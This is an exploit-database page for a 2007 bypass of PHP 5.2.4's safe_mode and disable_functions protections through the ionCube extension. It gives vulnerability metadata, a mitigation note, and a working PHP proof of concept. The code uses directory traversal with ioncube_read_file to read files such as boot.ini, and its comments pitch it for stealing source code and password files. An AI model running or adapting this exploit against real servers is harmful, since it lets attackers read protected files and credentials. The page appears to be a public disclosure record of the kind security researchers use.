PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

vendor:

PHP

by:

shinnai

5.5

CVSS

MEDIUM

Bypass protection

CWE

Product Name: PHP

Affected Version From: PHP 5.2.4

Affected Version To: PHP 5.2.4

Patch Exists: NO

Related CWE:

CPE: a:php:php:5.2.4

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Pro SP2

2007

PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

This exploit allows an attacker to bypass the safe_mode and disable_functions protections of the ionCube extension in PHP 5.2.4. By changing the file path, an attacker can retrieve sensitive information, such as source code and password files. The exploit works on Windows XP Pro SP2 with full patches and can be executed from the command line or Apache server.

Mitigation:

Upgrade to a newer version of PHP that includes a fix for this vulnerability. Alternatively, remove or disable the ionCube extension.

Source

Exploit-DB raw data:

<?php
//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Technical details:
//ionCube version: 6.5
//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
//url: www.ioncube.com

//php.ini settings:
//safe_mode = On
//disable_functions = ioncube_read_file, readfile

//Description:
//This is useful to obtain juicy informations but also to retrieve source
//code of php pages, password files, etc... you just need to change file path.
//Anyway, don't worry, nobody will read your obfuscated code :)

//greetz to: BlackLight for help me to understand better PHP

//P.S.
//This extension contains even an interesting ioncube_write_file function...

if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");

$path = str_repeat("..\\", 20);

$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)

$MyBoot_ioncube = ioncube_read_file($path."boot.ini");

echo $MyBoot_readfile;

echo "<br><br>ionCube output:<br><br>";

echo $MyBoot_ioncube;
?>

# milw0rm.com [2007-10-11]